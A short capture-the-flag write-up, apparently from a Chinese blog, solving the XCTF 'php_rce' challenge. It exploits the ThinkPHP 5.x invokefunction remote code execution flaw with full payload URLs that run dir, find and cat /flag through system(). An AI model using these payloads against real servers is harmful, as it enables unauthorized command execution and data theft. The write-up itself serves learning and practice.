php_rce 攻防世界xctf web

php_rce

首先了解ThinkPHP5.x rec 漏洞分析与复现https://blog.csdn.net/qq_40884727/article/details/101452478
var_pathinfo的默认配置为s,我们可以通过$_GET[‘s’]来传参
于是构造payload

http://111.198.29.45:30600/index.php?s=index/\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

在这里插入图片描述
DIR是DOS操作系统用来查看磁盘中文件的。命令dir有很多的参数,这是在windowsXP中的参数以及说明,也可能是Macromedia Director MX产生的文件。
查找flag文件

http://111.198.29.45:30600/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

在这里插入图片描述
用cat函数读取flag文件

http://111.198.29.45:30600/index.php?s=index/\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

得到flag

发布了19 篇原创文章 · 获赞 0 · 访问量 255

猜你喜欢

转载自blog.csdn.net/weixin_45689999/article/details/104605561